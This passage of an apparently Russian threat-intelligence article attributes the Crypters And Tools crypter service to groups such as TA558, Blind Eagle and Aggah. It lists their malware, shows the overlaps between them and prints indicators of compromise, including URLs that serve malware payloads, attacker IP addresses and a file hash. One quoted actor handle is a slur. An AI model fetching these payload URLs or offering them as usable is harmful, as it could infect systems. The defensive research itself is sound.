<strong>\u0411\u0435\u043b\u0430\u0440\u0443\u0441\u044c<\/strong>, <strong>\u041f\u043e\u043b\u044c\u0448\u0430<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u0420\u043e\u0441\u0441\u0438\u044f<\/strong>, <strong>\u0411\u0435\u043b\u0430\u0440\u0443\u0441\u044c, \u041f\u043e\u043b\u044c\u0448\u0430, <\/strong>\u0423\u043a\u0440\u0430\u0438\u043d\u0430, \u041c\u043e\u043b\u0434\u043e\u0432\u0430, \u0441\u0442\u0440\u0430\u043d\u044b \u0411\u0430\u043b\u0442\u0438\u0438<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0435 \u0412\u041f\u041e<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">Remcos RAT, Async RAT, njRAT, Quasar RAT, BitRAT, LimeRAT\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">Remcos RAT, Async RAT, Xworm, Lokibot, FormBook, Agent Tesla, Revenge RAT\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">Rhadamanthys, XWorm, Agent Tesla, Remcos RAT, Warzone RAT, nanocore RAT, njRAT, AzoRult, Lokibot, Revenge RAT<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">Async RAT, SwaetRAT, ScreenConnect (Remote Access Software)<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">Rhadamanthys, DarkTrack RAT, Meta Stealer<\/p>\n<\/td>\n<td>\n<p align=\"left\">Remcos RAT, Meduza Stealer, Lumma Stealer, Quasar RAT<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u042f\u0437\u044b\u043a \u043f\u0438\u0441\u0435\u043c \u0438 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">\u0418\u0441\u043f\u0430\u043d\u0441\u043a\u0438\u0439, \u043f\u043e\u0440\u0442\u0443-\u0433\u0430\u043b\u044c\u0441\u043a\u0438\u0439<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0418\u0441\u043f\u0430\u043d\u0441\u043a\u0438\u0439, \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0438\u0439, \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044f\u0437\u044b\u043a\u0438 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u044b\u0445 \u0440\u0435\u0433\u0438\u043e\u043d\u043e\u0432\u00a0\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0410\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0438\u0439, \u0438\u0441\u043f\u0430\u043d\u0441\u043a\u0438\u0439, \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044f\u0437\u044b\u043a\u0438 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u044b\u0445 \u0440\u0435\u0433\u0438\u043e\u043d\u043e\u0432\u00a0\u00a0<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"> N\/A<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">\u0420\u0443\u0441\u0441\u043a\u0438\u0439\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0423\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0439, \u0440\u0443\u0441\u0441\u043a\u0438\u0439, \u0440\u0443\u043c\u044b\u043d\u0441\u043a\u0438\u0439, \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0438\u0439<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0421\u0410\u0422<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">2023-2025<\/p>\n<\/td>\n<td>\n<p align=\"left\"> 2023-2025<\/p>\n<\/td>\n<td>\n<p align=\"left\">2021-2023\u00a0<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"> 2023<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">2024\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">2024\u00a0<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 2. \u0421\u0432\u043e\u0434\u043d\u0430\u044f \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 Crypters And Tools<\/p>\n<p>\u0412 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u044b \u043d\u0430 \u0442\u0440\u0451\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u0445: TA558, Blind Eagle \u0438 Aggah, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 Crypters And Tools, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0441 \u043d\u0438\u043c\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b. \u0414\u043b\u044f \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u043c \u0447\u0430\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0435\u0439 \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438 \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u0435:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\">\n<\/td>\n<td>\n<p align=\"left\"><strong>Aggah<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>Blind Eagle<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\"><strong>TA558<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\">\u2022 \u041f\u0435\u0440\u0438\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u00abcdt\u00bb \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 \u0432\u0441\u0435\u0445 \u0430\u0442\u0430\u043a<\/p>\n<p align=\"left\">\u2022 \u0410\u0442\u0430\u043a\u0438 \u043d\u0430 \u043e\u0442\u0435\u043b\u0438 \u0432 2018 \u0433\u043e\u0434\u0443<\/p>\n<p align=\"left\">\u2022 \u0421\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0412\u041f\u041e \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u043e\u0432 (3LOSH, Crypters And Tools)<\/p>\n<p align=\"left\">\u2022 \u041f\u043e\u0445\u043e\u0436\u0438\u0439 \u043a\u043e\u0434 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0432 2024 \u0433\u043e\u0434\u0443<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u2022 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043e\u0431\u0449\u0435\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b CryptersAndTools (servidorwindows.ddns.com.br)<\/p>\n<p align=\"left\">\u2022 \u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u0433\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0430\u0442\u0430\u043a \u2013 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/p>\n<p align=\"left\">\u2022 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u0444\u0438\u0448\u0438\u043d\u0433\u0435 \u0438\u0441\u043f\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u044f\u0437\u044b\u043a\u0430<\/p>\n<p align=\"left\">\u2022 \u041f\u043e\u0445\u043e\u0436\u0438\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 (Asyncrat, Remcos \u0438 \u0442.\u0434.)<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\"><strong>Aggah<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\">N\/A<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u00b7 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043e\u0431\u0449\u0435\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b CryptersAndTools (149.56.200.165)<\/p>\n<p align=\"left\">\u00b7\u00a0<a href=\"https:\/\/ti.qianxin.com\/blog\/articles\/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN\/\">\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0438<\/a>, \u0432 \u0441\u0432\u043e\u0451\u043c \u0440\u0435\u043f\u043e\u0440\u0442\u0435, \u0447\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0433\u0440\u0443\u043f\u043f\u0430 Aggah \u2013 \u044d\u0442\u043e \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u0430 Blind Eagle<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 3. \u041f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0435 \u043c\u0435\u0436\u0434\u0443 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438<\/p>\n<p>\u0412\u0441\u0435 \u0442\u0440\u0438 \u0433\u0440\u0443\u043f\u043f\u044b \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u044e\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a. Aggah \u0432 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0440\u0435\u043a\u0440\u0430\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Crypters And Tools \u0438\u043b\u0438 \u0438\u043b\u0438 \u0438\u0445 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432\u043d\u0435 \u0437\u043e\u043d\u044b \u043d\u0430\u0448\u0435\u0433\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0441\u0430\u043c\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430, \u0438 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u043c \u043e\u0431 \u044d\u0442\u043e\u043c \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435.<\/p>\n<p>\u0412 \u044d\u0442\u043e \u0436\u0435 \u0432\u0440\u0435\u043c\u044f, \u0422\u0410558 \u0438 Blind Ealge \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u043e\u043c.<\/p>\n<p>\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440,<a href=\"https:\/\/research.checkpoint.com\/2025\/blind-eagle-and-justice-for-all\/\"> \u0432 \u043c\u0430\u0440\u0442\u043e\u0432\u0441\u043a\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 Check Point Research<\/a> \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u043f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Blind Eagle. \u041c\u044b \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u0443\u044e \u0430\u0442\u0430\u043a\u0443 \u0432 \u0444\u0435\u0432\u0440\u0430\u043b\u0435, \u0438 \u0442\u043e\u0433\u0434\u0430 \u043d\u0430\u0441 \u043f\u0440\u0438\u0432\u043b\u0435\u043a IP 62.60.226[.]64, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 Check Point \u0442\u043e\u0436\u0435 \u0443\u043a\u0430\u0437\u0430\u043b\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u0430. \u041d\u0430 \u043d\u0451\u043c \u0440\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0444\u0430\u0439\u043b\u043e\u0432, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 Crypters And Tools, \u0445\u043e\u0442\u044f \u0432 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u0440 \u043c\u043e\u0433 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f.<\/p>\n<p>\u041f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 Blind Eagle \u043c\u044b \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u043c \u043d\u0438\u0436\u0435 \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u043f\u0440\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Crypters And Tools \u043f\u043e\u0434 \u043d\u0438\u043a\u0430\u043c\u0438 deadpoolstart2025 \u0438 ABBAS \u0438 \u0438\u0445 \u0441\u0432\u044f\u0437\u044c \u0441 \u0434\u0430\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u043e\u0439.<\/p>\n<p>\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 TA558 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Crypters And Tools \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0441\u043b\u0443\u0436\u0438\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u0432 \u043c\u0430\u0440\u0442\u0435, \u0433\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0444\u0430\u0439\u043b:<\/p>\n<ul>\n<li>\n<p>Purchase Inquiry.xla (SHA-256: 55ea07bbd700488fd6330d289f210b2da119401a9e27009472d1afec2f6c6339)<\/p>\n<\/li>\n<\/ul>\n<p>\u0412 \u0430\u0442\u0430\u043a\u0435 \u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u0435 \u0434\u043b\u044f TA558 URL:<\/p>\n<ul>\n<li>\n<p><a href=\"http:\/\/104.168.7.38\/xampp\/knct\/nicefeelingwithbestgoodthinksfor.txt\">http:\/\/104.168.7.38\/xampp\/knct\/nicefeelingwithbestgoodthinksfor.txt<\/a><\/p>\n<\/li>\n<li>\n<p>http:\/\/104.168.7.38\/xampp\/knct\/Lightgreatloversonhereforlovingpeoplesalot.hta<\/p>\n<\/li>\n<li>\n<p>http:\/\/104.168.7.38\/xampp\/knct\/Lightgreatloversonhereforlovingpeoplesalot.png<\/p>\n<\/li>\n<\/ul>\n<p>\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Brainiac, syscore \u0438 negrocock, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 TA558, \u0442\u0430\u043a\u0436\u0435 \u0431\u0443\u0434\u0443\u0442 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435.<\/p>\n<p>\u041e\u0442\u043c\u0435\u0442\u0438\u043c, \u0447\u0442\u043e TA558 \u0438 Blind Ealge \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0442\u043e\u043b\u044c\u043a\u043e Crypters And Tools \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2025 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0442\u0438\u043f\u0438\u0447\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e TA558:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/7ca\/dc1\/10a\/7cadc110a78907b7899f724880b920bc.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 TA558\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 TA558\" width=\"581\" height=\"457\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/7ca\/dc1\/10a\/7cadc110a78907b7899f724880b920bc.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/7ca\/dc1\/10a\/7cadc110a78907b7899f724880b920bc.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 TA558<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0438\u0441\u044c\u043c\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u043e \u0434\u0432\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u0443\u0437\u043d\u0430\u0432\u0430\u0435\u043c\u044b\u043c \u0434\u043b\u044f \u0422\u0410558 \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u043e\u043c:<\/p>\n<p>http:\/\/216.9.224.185\/33\/eco\/goodthingsforbestfeaturesgivenmegoodthingsforbest_______________goodthingsforbestfeaturesgivenme_____________goodthingsforbestfeaturesgivenme.doc<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b\u0441\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u043b\u0441\u044f goodthingsforbestfeaturesgivenme.vbe, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b\u043e \u043a \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044e \u0436\u0435\u0440\u0442\u0432\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e Remcos. Crypters And Tools \u0432 \u0434\u0430\u043d\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f.<\/p>\n<p><a class=\"anchor\" name=\"4\" id=\"4\"><\/a><\/p>\n<h2>4. PhaseShifters, UAC-0050 \u0438 PhantomControl<\/h2>\n<p><a href=\"https:\/\/habr.com\/ru\/companies\/pt\/articles\/892896\/\">\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u044b \u0443\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438<\/a>, \u0447\u0442\u043e \u0432\u044b\u0448\u043b\u0438 \u043d\u0430 \u0441\u0430\u043c Crypters And Tools, \u043a\u043e\u0433\u0434\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhaseShifters \u0438 UAC-0050. \u041f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0432 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043d\u0430\u0448\u0438\u0445<a href=\"https:\/\/www.ptsecurity.com\/ru-ru\/research\/pt-esc-threat-intelligence\/deti-ne-spisyvaem-novye-tehniki-gruppirovki-phase-shifters\/\"> \u0441\u0442\u0430\u0442\u0435\u0439<\/a>, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u044b \u043d\u0435 \u0431\u0443\u0434\u0435\u043c \u043a\u043e\u043d\u0446\u0435\u043d\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u044d\u0442\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043d\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u043c, \u0447\u0442\u043e \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0438\u0445 \u044f\u0432\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0441\u043e\u0437\u0434\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0441\u0430\u043c\u043e\u0433\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430. \u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043e\u043d\u0438 \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0438 \u043f\u043e\u0434\u043f\u0438\u0441\u043a\u0443.<\/p>\n<p>\u041f\u0440\u043e \u0433\u0440\u0443\u043f\u043f\u0443 PhantomControl \u0435\u0441\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u0432\u0430 \u043e\u0442\u0447\u0435\u0442\u0430 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Esentire. \u0412 \u043f\u0435\u0440\u0432\u043e\u043c<a href=\"https:\/\/www.esentire.com\/blog\/operation-phantomcontrol\"> \u043e\u0442\u0447\u0435\u0442\u0435<\/a> Crypters And Tools \u043d\u0435 \u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043b, \u043d\u043e \u0432\u043e<a href=\"https:\/\/www.esentire.com\/blog\/phantomcontrol-returns-with-ande-loader-and-swaetrat\"> \u0432\u0442\u043e\u0440\u043e\u043c<\/a> \u0433\u0440\u0443\u043f\u043f\u0430 \u0441\u0442\u0430\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Ande Loader. \u0412 \u043e\u0442\u0447\u0435\u0442\u0435 \u0434\u0430\u043d\u043d\u043e\u0435 \u0412\u041f\u041e \u0431\u044b\u043b\u043e \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043a \u0433\u0440\u0443\u043f\u043f\u0435 Blind Eagle, \u043d\u043e Ande Loader \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 Crypters And Tools, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u044f\u043c\u0430\u044f \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u044f \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430. \u0422\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 paste.ee \u0438 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438, \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0443. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u043e\u0436\u043d\u043e \u0442\u043e\u0447\u043d\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 Crypters And Tools \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u043d\u043e \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e PhantomControl \u043c\u044b \u043d\u0435 \u0440\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c.<\/p>\n<p><a class=\"anchor\" name=\"5\" id=\"5\"><\/a><\/p>\n<h2>5. \u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b TA558 \u0438 \u0435\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u044f \u043e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Blind Eagle<\/h2>\n<p>\u0412 \u0441\u0442\u0430\u0442\u044c\u044f\u0445, \u0433\u0434\u0435 